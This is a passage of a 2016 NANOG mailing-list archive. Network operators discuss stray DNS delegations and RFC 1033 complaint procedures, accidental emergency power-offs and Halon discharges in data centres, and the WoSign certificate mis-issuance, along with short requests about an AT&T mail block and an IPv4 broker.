ebay.com's NS records at you, the resulting disfunction would be noticed fairly soon.... (Miscreants who do this intentionally are, of course, a totally different kettle of fish, and need to be dealt with as micreants....) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 830 bytes Desc: not available URL: From eric.kuhnke at gmail.com Tue Aug 30 23:25:08 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 16:25:08 -0700 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: Message-ID: If public transit operators can put a breakable plexiglass shield over the emergency door opening handle, on every bus, it's not a very high technical barrier. On Mon, Aug 29, 2016 at 2:51 PM, Sean Donelan wrote: > > See that big red button on the wall under the sign "Do Not Push This > Button!".... > > > DC 911 outage caused by contractor error > http://wtop.com/dc/2016/08/dc-911-outage-caused-by-contracto > r-who-pulled-wrong-switch/ > > WASHINGTON ? D.C. is now operating two separate 911 centers after a power > outage caused by human error left the nation?s capital without any > emergency phone service for almost an hour on a busy weekend night. > > A contractor working Saturday night inadvertently pulled an emergency > power shut off switch that cut electricity to the 911 phone system and a > call routing system at the District?s Unified Communications Center, said > the center?s Director Karima Holmes. > > ?Unfortunately because it was human error we weren?t prepared for it,? > Holmes said. > > [...] > > > From eric.kuhnke at gmail.com Tue Aug 30 23:26:40 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 16:26:40 -0700 Subject: Don't press the big red buttom on the wall! In-Reply-To: <22469.61633.450785.508783@gargle.gargle.HOWL> References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: Does this mean you could drive around with a (illegal, but not difficult to build or obtainl) 20W wide band VHF/UHF jammer radio fed into a 1 meter parabolic dish, aim it at random buildings and set off peoples' halon systems? Wow. On Tue, Aug 30, 2016 at 1:46 PM, wrote: > > About the worst that ever happened to me was a security guy's > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > refill and was fairly exciting for those present. That also cut the > machine room's power. > > At least it didn't set off the sprinkler system. > > We sat down with the Halon system vendor to find out why that happened > after proving, on a by-passed system, that yes indeed one of these > common walkie-talkies sets the thing off. > > File under: More Things To Worry About! > > -- > -Barry Shein > > Software Tool & Die | bzs at TheWorld.com | > http://www.TheWorld.com > Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD > The World: Since 1989 | A Public Information Utility | *oo* > From owen at delong.com Tue Aug 30 23:41:25 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 16:41:25 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <20160830220247.B429652F1A39@rock.dv.isc.org> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <20160830220247.B429652F1A39@rock.dv.isc.org> Message-ID: <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> > On Aug 30, 2016, at 15:02 , Mark Andrews wrote: > > > In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com >, Owen DeLong writes: >>> On Aug 29, 2016, at 17:01 , Mark Andrews wrote: >>> >>> >>> In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: >>>> Once upon a time, Mark Andrews said: >>>>> The following is general and is not directed at Cloudflare. I know >>>>> some people don't think errors in the reverse DNS are not critical >>>>> but if you are delegated a zone it is your responsablity to ensure >>>>> your servers are correctly serving that zone regardless of where >>>>> it is in the DNS heirarchy. Failure to do that causes additional >>>>> work for recursive servers. If you don't want to serve a zone then >>>>> remove the delegation. >>>> >>>> You are assuming that an authoritative server operator has some way to >>>> know all the zones people delegate to their servers, and remove such >>>> delegations if they don't want to handle them. That is a wrong >>>> assumption. >>> >>> They have methods. They choose not to use them. See RFC 1033 >>> COMPLAINTS then after that the court system. >>> >>> Mark >> >> Let us review this and compare to your statement? >> >> From RFC 1033: >>> COMPLAINTS >>> >>> These are the suggested steps you should take if you are having >>> problems that you believe are caused by someone else's name server: >>> >>> >>> 1. Complain privately to the responsible person for the domain. You >>> can find their mailing address in the SOA record for the domain. >>> >>> 2. Complain publicly to the responsible person for the domain. >>> >>> 3. Ask the NIC for the administrative person responsible for the >>> domain. Complain. You can also find domain contacts on the NIC in >>> the file NETINFO:DOMAIN-CONTACTS.TXT >>> >>> 4. Complain to the parent domain authorities. >>> >>> 5. Ask the parent authorities to excommunicate the domain. >> >> 1. Doesn?t really apply in a situation where someone has pointed >> an NS record for a domain at your server without warning. There >> is no SOA record from which to retrieve said mailing address. > > If they have pointed a NS record at you there is a SOA record. Either > in the zone or in the delegating zone. Sure, but most likely this isn?t particularly useful? See below. > >> Also doesn?t work very well in cases where the SOA record does >> not contain a valid email address that reaches someone. > > Some do, some don't. There is also whois address, web contact addresses > etc. Sometimes, if you?re lucky, if it all works as intended and the person isn?t using domain privacy? > >> 2. Do we really want NANOG buried in ?Will the >> @#@!@$!@$% who delegated XYZ.COM > NS Records to >> point to >> my servers and please cease and desist?? >> messages? Personally, I vote no. > > Why not. It is a operational message about a misconfiguration. Because NANOG isn?t for solving individual misconfigurations. It?s for discussing issues on the internet requiring coordination. This doesn?t require coordination of multiple providers, it?s a simple bug report. It would significantly raise the N in SNR IMHO. Your opinion may differ. I still vote no. > >> 3. The NIC? Please explicate Mr. Andrews what that would mean >> in the modern era. Please cover both the normal case and >> the cases where domain privacy is configured. >> >> 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY >> is unlikely to help much when $REGISTRAR accepted an NS record >> from one of their customers for a domain they registered >> that happens to point to your server. Similarly, I suspect >> $REGISTRAR is going to tell you that they won?t make changes >> without authorization from the domain owner. > > The registrar becomes party to the disruption to your services and > no the contract the registry signed with ICANN does not save them > from being fined by a court further down the process so they should > listen as it is their finanical interests to listen. What disruption? It?s pretty hard to argue that sending back some SERVFAIL responses as a result of a few errant packets on UDP/53 constitutes a significant disruption to service. > Criminal law trumps contract law and deliberate disruption to > services falls under criminal law. It becomes deliberate once they > fail to act on the complaint in a timely manner. Remember we are > dealing with matters of fact here. Published NS records and address > records. Sure, but to get a DA to prosecute for deliberate disruption, one has to be able to prove intent. Mere misconfiguration is not intent. Mere misconfiguration followed by ignoring bug reports becomes a little more grey, but I bet you?re still not likely to get very far without a much larger disruption to your service in the form of time spent than you suffer by simply ignoring it. > Add to that there are published proceedures that are not being > followed that they should be aware of. Published procedures don?t have the force of law. They may help you to create a presumption of misconduct or negligence, but that?s about as far as they can go. >> 5. I suspect that success in this effort will likely parallel >> the level of success I would expect in step 4. >> >> So, now that we?ve realized that RFC-1033 is utterly useless in this >> context and badly outdated to boot, let?s review your other suggestion? > > No, it isn't utterly useless. It also shows you have tried to solve > the problem in a civil manner if you take it further. It has a less than 0.001% probability of achieving a useful end result. I consider that within the realm of ?utterly useless?. YMMV. > >> ?? after that [sic] the court system.? >> >> [sic] refers to the missing comma. >> >> So let me see if I understand correctly. >> >> I run a pair of nameservers. Let?s call them ns1.company.com >> and ns2.company.com >> >> Someone registers example.com and points NS records >> in the COM zone at my >> nameservers. >> >> I?m now supposed to seek judicial relief in order to compel them to stop >> doing that? >> >> Small claims doesn?t process claims seeking injunctive relief. I suppose >> I could >> use a $1,500 or even $5,000 small claims case as a way to get their >> attention, >> but that?s kind of an abuse of the process. If I want an injunction, at >> least >> in California, I have to go to Superior court. >> >> Now, first, we have to figure out jursidiction. As a general rule, >> jurisdiction >> goes to the court which is responsible for the locale in which the event >> takes >> place or where the contract was entered into, or the jursidiction set by >> the >> contract. In this case, there?s no contract, so we have to look at where >> the >> event in question occurred. The problem is that the law hasn?t really >> caught >> up with technology in this area and depending on who ends up being parties >> to the suit, the definition gets pretty murky at best. Is it the primary >> office of the registry? The registrar? The registrant? The location of the >> nameserver(s) which are erroneously pointed to? (What if they are anycast >> all over the world?) The business address of the operator or owner of >> those >> nameservers? Where, exactly do we file this suit? > > Your lawyer will work that out. OK, so let me make sure I?m understanding you correctly. I?m getting these extra packets I don?t want. They?re probably costing me less than $1/day, but they?re a bit annoying. You now want me to go pay someone $300/hour to sort all of this out, probably against a $5,000 or $10,000 retainer just to start? Will you be financing any of these operations, or, are you just hoping that we?re all dumb enough to bankrupt ourselves in the name of clean DNS? >> The next problem we have is who to sue. Do we sue the domain registrant? >> The >> registrar they used to register the domain name? etc. > > Your lawyer will work that out. See above. >> Yeah, I don?t think there?s enough possibility of any sort of recovery to >> make that worth the effort or expense. > > So you decide to not avail yourself of the process available to you. That > is not the same thing as saying there is no process. I never said there was no process. I said that the existing process was useless. If the procedural argument doesn?t convince you and the economic argument doesn?t sink in, then, you are entitled to your opinion, but I?m willing to bet that a much larger fraction of the community believes that there is nothing to be gained from the process compared to the costs of engaging in it. Owen From owen at delong.com Tue Aug 30 23:43:59 2016 From: owen at delong.com (Owen DeLong) Date: Tue, 30 Aug 2016 16:43:59 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <8738.1472597403@turing-police.cc.vt.edu> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <8738.1472597403@turing-police.cc.vt.edu> Message-ID: <2171203D-A70B-415D-B0A5-192591DF0575@delong.com> > On Aug 30, 2016, at 15:50 , Valdis.Kletnieks at vt.edu wrote: > > On Tue, 30 Aug 2016 14:39:10 -0700, Owen DeLong said: > >> I run a pair of nameservers. Let?s call them ns1.company.com >> and ns2.company.com > >> Someone registers example.com and points NS records in the COM zone at my >> nameservers. > > I would have expected that the resulting NXDOMAIN replies from ns1 and ns2 > would usually make this a self-correcting problem. You don?t get NXDOMAIN when a nameserver gets a request for a zone it doesn?t serve. You either get SERVFAIL or you get NS records back as a referral. > Are there actually people who do this misconfiguration on a zone big enough > for the traffic to matter, and leave it that way for very long before they > clue in that things aren't working right? I'd think that if somebody points > billy-bobs-bait-tackle-and-internet.com at you, it might take you quite some > time to notice - and if somebody whoopsies and points ebay.com's NS records > at you, the resulting disfunction would be noticed fairly soon?. Depends on your definition of ?matter?. Also, misconfiguring one important zone doesn?t necessarily generate significantly more traffic than generating a whole lot of unimportant ones. Especially if you misconfigure zones in ip6.arpa or in-addr.arpa as was the case at the beginning of this topic. > (Miscreants who do this intentionally are, of course, a totally different > kettle of fish, and need to be dealt with as micreants....) Yep, though one has to wonder why they would bother. Owen From marka at isc.org Wed Aug 31 00:12:13 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 10:12:13 +1000 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: Your message of "Tue, 30 Aug 2016 16:41:25 -0700." <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> <926F8B85-8864-4424-BEAA-1836B718A9FD@delong.com> <20160830220247.B429652F1A39@rock.dv.isc.org> <46671DC5-3138-4E7A-A5AF-631B98FE354A@delong.com> Message-ID: <20160831001213.E2BC052F4E26@rock.dv.isc.org> In message <46671DC5-3138-4E7A-A5AF-631B98FE354A at delong.com>, Owen DeLong writes: > > > On Aug 30, 2016, at 15:02 , Mark Andrews wrote: > > > > > > In message <926F8B85-8864-4424-BEAA-1836B718A9FD at delong.com > >, Owen DeLong > writes: > >>> On Aug 29, 2016, at 17:01 , Mark Andrews wrote: > >>> > >>> > >>> In message <20160829234737.GA16137 at cmadams.net>, Chris Adams writes: > >>>> Once upon a time, Mark Andrews said: > >>>>> The following is general and is not directed at Cloudflare. I know > >>>>> some people don't think errors in the reverse DNS are not critical > >>>>> but if you are delegated a zone it is your responsablity to ensure > >>>>> your servers are correctly serving that zone regardless of where > >>>>> it is in the DNS heirarchy. Failure to do that causes additional > >>>>> work for recursive servers. If you don't want to serve a zone then > >>>>> remove the delegation. > >>>> > >>>> You are assuming that an authoritative server operator has some way > to > >>>> know all the zones people delegate to their servers, and remove such > >>>> delegations if they don't want to handle them. That is a wrong > >>>> assumption. > >>> > >>> They have methods. They choose not to use them. See RFC 1033 > >>> COMPLAINTS then after that the court system. > >>> > >>> Mark > >> > >> Let us review this and compare to your statement??? > >> > >> From RFC 1033: > >>> COMPLAINTS > >>> > >>> These are the suggested steps you should take if you are having > >>> problems that you believe are caused by someone else's name server: > >>> > >>> > >>> 1. Complain privately to the responsible person for the domain. > You > >>> can find their mailing address in the SOA record for the domain. > >>> > >>> 2. Complain publicly to the responsible person for the domain. > >>> > >>> 3. Ask the NIC for the administrative person responsible for the > >>> domain. Complain. You can also find domain contacts on the NIC in > >>> the file NETINFO:DOMAIN-CONTACTS.TXT > >>> > >>> 4. Complain to the parent domain authorities. > >>> > >>> 5. Ask the parent authorities to excommunicate the domain. > >> > >> 1. Doesn???t really apply in a situation where someone has pointed > >> an NS record for a domain at your server without warning. There > >> is no SOA record from which to retrieve said mailing address. > > > > If they have pointed a NS record at you there is a SOA record. Either > > in the zone or in the delegating zone. > > Sure, but most likely this isn???t particularly useful??? See below. > > > > >> Also doesn???t work very well in cases where the SOA record does > >> not contain a valid email address that reaches someone. > > > > Some do, some don't. There is also whois address, web contact addresses > > etc. > > Sometimes, if you???re lucky, if it all works as intended and the person > isn???t using domain privacy??? Domain privacy is supposed to pass on operational and legal issues. It isn't a get out of free card for not running a nameserver / zone correctly. > >> 2. Do we really want NANOG buried in ???Will the > >> @#@!@$!@$% who delegated XYZ.COM > > NS Records to > >> point to > >> my servers and please cease and desist???? > >> messages? Personally, I vote no. > > > > Why not. It is a operational message about a misconfiguration. > > Because NANOG isn???t for solving individual misconfigurations. It???s for > discussing issues on the internet requiring coordination. > > This doesn???t require coordination of multiple providers, it???s a simple > bug report. > > It would significantly raise the N in SNR IMHO. Your opinion may differ. > > I still vote no. > > >> 3. The NIC? Please explicate Mr. Andrews what that would mean > >> in the modern era. Please cover both the normal case and > >> the cases where domain privacy is configured. > >> > >> 4. This might _MIGHT_ actually work, but I suspect that $REGISTRY > >> is unlikely to help much when $REGISTRAR accepted an NS record > >> from one of their customers for a domain they registered > >> that happens to point to your server. Similarly, I suspect > >> $REGISTRAR is going to tell you that they won???t make changes > >> without authorization from the domain owner. > > > > The registrar becomes party to the disruption to your services and > > no the contract the registry signed with ICANN does not save them > > from being fined by a court further down the process so they should > > listen as it is their finanical interests to listen. > > What disruption? It???s pretty hard to argue that sending back some > SERVFAIL responses as a result of a few errant packets on UDP/53 > constitutes a significant disruption to service. Owen you have zero knowledge of the volume or impact a configuration error causes. Some are minor, some are not. > > Criminal law trumps contract law and deliberate disruption to > > services falls under criminal law. It becomes deliberate once they > > fail to act on the complaint in a timely manner. Remember we are > > dealing with matters of fact here. Published NS records and address > > records. > > Sure, but to get a DA to prosecute for deliberate disruption, one has > to be able to prove intent. Mere misconfiguration is not intent. > Mere misconfiguration followed by ignoring bug reports becomes a little > more grey, but I bet you???re still not likely to get very far without > a much larger disruption to your service in the form of time spent > than you suffer by simply ignoring it. I suspect ignoring a certified letter complaining about the problem with easily verifiable facts leads to easily provable intent. > > Add to that there are published proceedures that are not being > > followed that they should be aware of. > > Published procedures don???t have the force of law. They may help you > to create a presumption of misconduct or negligence, but that???s about > as far as they can go. I agree they don't have the force of law but courts do pay attention to them especially when one of the parties involved has tried to follow them to avoid going to the courts in the first place. > >> 5. I suspect that success in this effort will likely parallel > >> the level of success I would expect in step 4. > >> > >> So, now that we???ve realized that RFC-1033 is utterly useless in this > >> context and badly outdated to boot, let???s review your other suggestion??? > > > > No, it isn't utterly useless. It also shows you have tried to solve > > the problem in a civil manner if you take it further. > > It has a less than 0.001% probability of achieving a useful end result. A made up statistic. I've had better success with errors at stage 1 than that, probably about 20% and no I don't have the records to prove it. > I consider that within the realm of ???utterly useless???. YMMV. > > >> ?????? after that [sic] the court system.??? > >> > >> [sic] refers to the missing comma. > >> > >> So let me see if I understand correctly. > >> > >> I run a pair of nameservers. Let???s call them ns1.company.com > >> and ns2.company.com > >> > >> Someone registers example.com and points NS > records > >> in the COM zone at my > >> nameservers. > >> > >> I???m now supposed to seek judicial relief in order to compel them to > stop > >> doing that? > >> > >> Small claims doesn???t process claims seeking injunctive relief. I > suppose > >> I could > >> use a $1,500 or even $5,000 small claims case as a way to get their > >> attention, > >> but that???s kind of an abuse of the process. If I want an injunction, at > >> least > >> in California, I have to go to Superior court. > >> > >> Now, first, we have to figure out jursidiction. As a general rule, > >> jurisdiction > >> goes to the court which is responsible for the locale in which the > event > >> takes > >> place or where the contract was entered into, or the jursidiction set > by > >> the > >> contract. In this case, there???s no contract, so we have to look at > where > >> the > >> event in question occurred. The problem is that the law hasn???t really > >> caught > >> up with technology in this area and depending on who ends up being > parties > >> to the suit, the definition gets pretty murky at best. Is it the > primary > >> office of the registry? The registrar? The registrant? The location of > the > >> nameserver(s) which are erroneously pointed to? (What if they are > anycast > >> all over the world?) The business address of the operator or owner of > >> those > >> nameservers? Where, exactly do we file this suit? > > > > Your lawyer will work that out. > > OK, so let me make sure I???m understanding you correctly. > > I???m getting these extra packets I don???t want. They???re probably costing me > less than $1/day, but they???re a bit annoying. > > You now want me to go pay someone $300/hour to sort all of this out, > probably > against a $5,000 or $10,000 retainer just to start? > > Will you be financing any of these operations, or, are you just hoping > that > we???re all dumb enough to bankrupt ourselves in the name of clean DNS? > > >> The next problem we have is who to sue. Do we sue the domain > registrant? > >> The > >> registrar they used to register the domain name? etc. > > > > Your lawyer will work that out. > > See above. > > >> Yeah, I don???t think there???s enough possibility of any sort of recovery > to > >> make that worth the effort or expense. > > > > So you decide to not avail yourself of the process available to you. > That > > is not the same thing as saying there is no process. > > I never said there was no process. I said that the existing process was > useless. > > If the procedural argument doesn???t convince you and the economic argument > doesn???t > sink in, then, you are entitled to your opinion, but I???m willing to bet > that a > much larger fraction of the community believes that there is nothing to > be gained > from the process compared to the costs of engaging in it. > > Owen -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From larrysheldon at cox.net Wed Aug 31 00:52:40 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Tue, 30 Aug 2016 19:52:40 -0500 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: <20160830142110.GA792@sizone.org> Message-ID: <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> On 8/30/2016 09:40, Keith Stokes wrote: > At one point in one data center I dealt with a disgruntled employee > hit the UPS disconnect button on the way out. > > Same story, procedures modified, cover put over switch with a hammer > to break the glass, lessons learned, accounts credited. A very long time ago ("network" involved a fleet of green "wide-band" trucks, hauling tapes to contractors and other offices) the system involved 9 computer centers around the state, built over a period of years, so they had a lot of similarities but some key differences. Many of them had wide, pneumatic sliding doors between the computer room and the unit-record rooms. Some of the doors had floor mats that would pop the doors open when stepped on (or a cart full of card trays was rolled onto). Many of them (for what ever reason--I think I know but it isn't relevant here) had large black buttons on each side of the doors, on each side of the wall. It happened that one had the mats at the sliding doors. but there was an ordinary door near the consoles that had a large black button next to it. It was in this office that a conversion team was running some stuff that ran for hours (in violation of the rule that if a job ran more than thirty minutes it Must Include checkpoint-restart points every 20 minutes) was nearly finished after running all day and all night (as I recall it). One of the team left the computer room via the ordinary door, pushing the big black button. Which was (you saw this coming a long time ago, right?) the Emergency Power Off button. I do not recall any lessons being learned. At all. The group leader (that refused to include checkpoint-restart) years later was conducting a conversion run in a different system but that had many of the same standards ran a job that ran many many hours in a computer center known for flaky power. Without Checkpoint-Restart. We took a power hit when the run had something like 24 records left to process. -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From larrysheldon at cox.net Wed Aug 31 01:01:59 2016 From: larrysheldon at cox.net (Larry Sheldon) Date: Tue, 30 Aug 2016 20:01:59 -0500 Subject: Don't press the big red buttom on the wall! In-Reply-To: <22469.61633.450785.508783@gargle.gargle.HOWL> References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: On 8/30/2016 15:46, bzs at theworld.com wrote: > > About the worst that ever happened to me was a security guy's > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > refill and was fairly exciting for those present. That also cut the > machine room's power. > > At least it didn't set off the sprinkler system. > > We sat down with the Halon system vendor to find out why that happened > after proving, on a by-passed system, that yes indeed one of these > common walkie-talkies sets the thing off. > > File under: More Things To Worry About! We used to have to drive across a quarry to get to a repeater station (or to one of the cables, which was "aerial" across the quarry), and lots of folks scoffed at the "turn off two-way radios" signs as we approached the area. I did not scoff. -- "Everybody is a genius. But if you judge a fish by its ability to climb a tree, it will live its whole life believing that it is stupid." --Albert Einstein From Larry's Cox account. From marka at isc.org Wed Aug 31 01:09:07 2016 From: marka at isc.org (Mark Andrews) Date: Wed, 31 Aug 2016 11:09:07 +1000 Subject: Don't press the big red buttom on the wall! In-Reply-To: Your message of "Tue, 30 Aug 2016 19:52:40 -0500." <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> References: <20160830142110.GA792@sizone.org> <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> Message-ID: <20160831010907.A0E9052F5A72@rock.dv.isc.org> Back when there were external disk drives with disc packs my boss said "what does this switch do?" then flipped it. The next thing that happened was the paper console started printing as the mounted disc drive had just been powered off on the VAX 750. oops. We all had a unscheduled lunch as the system rebooted and the filesystems where checked. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From bzs at theworld.com Wed Aug 31 03:52:24 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Tue, 30 Aug 2016 23:52:24 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: References: <20160830142110.GA792@sizone.org> <22469.61633.450785.508783@gargle.gargle.HOWL> Message-ID: <22470.21624.649090.30215@gargle.gargle.HOWL> On August 30, 2016 at 16:26 eric.kuhnke at gmail.com (Eric Kuhnke) wrote: > Does this mean you could drive around with a (illegal, but not difficult to > build or obtainl) 20W wide band VHF/UHF jammer radio fed into a 1 meter > parabolic dish, aim it at random buildings and set off peoples' halon > systems? Wow. I'd like to think it's been fixed. Then again there are those Blasting Zones one goes thru on highways with big signs ordering drivers: NO CELLPHONE USE! BLASTING ZONE! Sounds like a good plan. > On Tue, Aug 30, 2016 at 1:46 PM, wrote: > > > > > About the worst that ever happened to me was a security guy's > > walkie-talkie setting off an instant Halon drop. Cost about $10,000 to > > refill and was fairly exciting for those present. That also cut the > > machine room's power. > > > > At least it didn't set off the sprinkler system. > > > > We sat down with the Halon system vendor to find out why that happened > > after proving, on a by-passed system, that yes indeed one of these > > common walkie-talkies sets the thing off. > > > > File under: More Things To Worry About! > > > > -- > > -Barry Shein > > > > Software Tool & Die | bzs at TheWorld.com | > > http://www.TheWorld.com > > Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD > > The World: Since 1989 | A Public Information Utility | *oo* > > -- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From bzs at theworld.com Wed Aug 31 04:06:13 2016 From: bzs at theworld.com (bzs at theworld.com) Date: Wed, 31 Aug 2016 00:06:13 -0400 Subject: Don't press the big red buttom on the wall! In-Reply-To: <20160831010907.A0E9052F5A72@rock.dv.isc.org> References: <20160830142110.GA792@sizone.org> <04cdb57b-87b7-67ff-10e0-286fb8a41654@cox.net> <20160831010907.A0E9052F5A72@rock.dv.isc.org> Message-ID: <22470.22453.425855.934941@gargle.gargle.HOWL> One day, when I ran the Harvard Chemistry computing facility, I was greeted on my way in by panicked profs and grad students that the big VMS VAX (8MB! two memory cabinets! we gave tours!) was behaving strangely I forget what probably crawling. A lot of its use was for long-running jobs, week plus, basically inverting matrices. So I lept into action, whipped off my heavy winter coat and tossed it onto one of the big disk drives and wham the system just halted. Static I guess. Came back ok. Problem solved. -- -Barry Shein Software Tool & Die | bzs at TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo* From eric.kuhnke at gmail.com Wed Aug 31 04:38:55 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 21:38:55 -0700 Subject: Chinese root CA issues rogue/fake certificates Message-ID: http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html One of the largest Chinese root certificate authority WoSign issued many fake certificates due to an vulnerability. WoSign's free certificate service allowed its users to get a certificate for the base domain if they were able to prove control of a subdomain. This means that if you can control a subdomain of a major website, say percy.github.io, you're able to obtain a certificate by WoSign for github.io, taking control over the entire domain. From royce at techsolvency.com Wed Aug 31 05:11:52 2016 From: royce at techsolvency.com (Royce Williams) Date: Tue, 30 Aug 2016 21:11:52 -0800 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke wrote: > > http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html > > One of the largest Chinese root certificate authority WoSign issued many > fake certificates due to an vulnerability. WoSign's free certificate > service allowed its users to get a certificate for the base domain if they > were able to prove control of a subdomain. This means that if you can > control a subdomain of a major website, say percy.github.io, you're able to > obtain a certificate by WoSign for github.io, taking control over the > entire domain. And there is now strong circumstantial evidence that WoSign now owns - or at least, directly controls - StartCom: https://www.letsphish.org/?part=about There are mixed signals of incompetence and deliberate action here. Royce From eric.kuhnke at gmail.com Wed Aug 31 06:02:16 2016 From: eric.kuhnke at gmail.com (Eric Kuhnke) Date: Tue, 30 Aug 2016 23:02:16 -0700 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: mozilla.dev.security thread: https://groups.google.com/forum/m/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I/discussion On Aug 30, 2016 10:12 PM, "Royce Williams" wrote: > On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke > wrote: > > > > http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html > > > > One of the largest Chinese root certificate authority WoSign issued many > > fake certificates due to an vulnerability. WoSign's free certificate > > service allowed its users to get a certificate for the base domain if > they > > were able to prove control of a subdomain. This means that if you can > > control a subdomain of a major website, say percy.github.io, you're > able to > > obtain a certificate by WoSign for github.io, taking control over the > > entire domain. > > > And there is now strong circumstantial evidence that WoSign now owns - > or at least, directly controls - StartCom: > > https://www.letsphish.org/?part=about > > There are mixed signals of incompetence and deliberate action here. > > Royce > From mel at beckman.org Wed Aug 31 06:50:12 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 31 Aug 2016 06:50:12 +0000 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: , Message-ID: <31C4C9C4-B9EE-4AB5-8C0B-AA1EDA600750@beckman.org> We've received several unsolicited certificate approval requests from wosign sign on high-value domain names we manage. Wosign has never responded to our requests for information about the requesters. There really isn't anything we can do other than ignore the requests, but clearly somebody is pushing buttons to try to take over these domains or operate MITM attacks. -mel beckman > On Aug 30, 2016, at 11:03 PM, Eric Kuhnke wrote: > > mozilla.dev.security thread: > > https://groups.google.com/forum/m/#!topic/mozilla.dev.security.policy/k9PBmyLCi8I/discussion > > >> On Aug 30, 2016 10:12 PM, "Royce Williams" wrote: >> >> On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke >> wrote: >>> >>> http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html >>> >>> One of the largest Chinese root certificate authority WoSign issued many >>> fake certificates due to an vulnerability. WoSign's free certificate >>> service allowed its users to get a certificate for the base domain if >> they >>> were able to prove control of a subdomain. This means that if you can >>> control a subdomain of a major website, say percy.github.io, you're >> able to >>> obtain a certificate by WoSign for github.io, taking control over the >>> entire domain. >> >> >> And there is now strong circumstantial evidence that WoSign now owns - >> or at least, directly controls - StartCom: >> >> https://www.letsphish.org/?part=about >> >> There are mixed signals of incompetence and deliberate action here. >> >> Royce >> From admin at webhosting.net Tue Aug 30 13:22:43 2016 From: admin at webhosting.net (Webhosting.net Admin) Date: Tue, 30 Aug 2016 13:22:43 +0000 Subject: Need abuse/postmaster contact for AT&T to resolve IP block Message-ID: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> A few of our exchange IPs get blocked intermittently, but only by ATT. Ips are clean, no issues, we?re diligent about finding and fixing these types of issues as it has a large impact. It would be very helpful to know why the IP below got blocked so we can find and fix the problem to prevent further listing. We have a few ips in rotation and some have no issue. It?s a ?blind? listing, so we only find out about it when customers complain that they getting blocked. ff-ip4-mx-vip1.prodigy.net #_is_blocked.__For_information_see_http://att.net/blocks> #SMTP# Any info/help would be most helpful. Many thanks, Webhosting.net Postmaster From lorenzo.mainardi at digitelitalia.com Tue Aug 30 15:43:46 2016 From: lorenzo.mainardi at digitelitalia.com (Lorenzo Mainardi) Date: Tue, 30 Aug 2016 15:43:46 +0000 Subject: IPv4 Broker Message-ID: Do you know any good IPv4 broker? I need a /20. Regards From nanog at nigelj.net Wed Aug 31 00:23:26 2016 From: nanog at nigelj.net (Nigel Jones) Date: Wed, 31 Aug 2016 12:23:26 +1200 Subject: Cloudflare reverse DNS SERVFAIL, normal? In-Reply-To: <8738.1472597403@turing-police.cc.vt.edu> References: <20160829212843.53C1252BB76F@rock.dv.isc.org> <20160829234737.GA16137@cmadams.net> <20160830000141.56CE952C6CF0@rock.dv.isc.org> 